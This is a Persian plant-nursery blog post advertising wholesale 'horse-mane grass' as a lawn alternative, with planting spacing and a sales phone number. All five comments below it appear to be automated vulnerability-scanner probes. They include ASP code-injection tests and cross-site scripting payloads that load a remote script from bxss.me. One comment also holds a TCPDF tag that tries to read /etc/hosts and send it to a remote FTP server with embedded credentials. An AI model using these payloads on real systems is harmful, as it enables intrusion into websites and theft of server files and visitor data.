فروش عمده چمن یال اسبی

نوشته شده توسط helpfa5692 2016/11/08 23:40:48 5 نظرات چمن ها و گیاهان پوششی,

این گیاه دائم سبز را میتوانید به جای چمن استفاده کنید و نیازی به کوتاه کردن ندارد اما مثل چمن پاخوری مقاومی ندارد یعنی زیاد نیاید  روی آن راه رفت . بهترین فاصله برای کاشت این گیاه به طوری که خوب پر کند ۲۰ سانت است. در باغ های صخره ای نیز کاربرد دارن . در حاشیه های فضای سبز نیز خیلی زیبا دیده میشود.


دوستان و علاقه مندان جهت خرید بوته چمن یال اسبی می توانند با واحد فروش ایباغ

09113959194

تماس بگیرند و از قیمت و شرایط فیزیکی گیاه مطلع شوند

 

5 نظرات

e:
2017/09/20 16:58:25, 04:58:25 PM, e
پاسخ

response.write(9614699*9410015)

e:
2017/09/20 16:58:30, 04:58:30 PM, e
پاسخ

'+response.write(9614699*9410015)+'

e:
2017/09/20 16:58:35, 04:58:35 PM, e
پاسخ

"+response.write(9614699*9410015)+"

e:
2017/09/20 16:58:53, 04:58:53 PM, e
پاسخ

</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013981&r=12-3337&h=12-69216-2&/).slice(2),document.documentElement.appendChild(s))//'>

e:
2017/09/20 16:58:57, 04:58:57 PM, e
پاسخ

'>"><script src=http://bxss.me/s?u=013981&r=12-3338&h=12-69216-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,013981,12-3338,12,69216,%22%5D"/>

ارسال نظر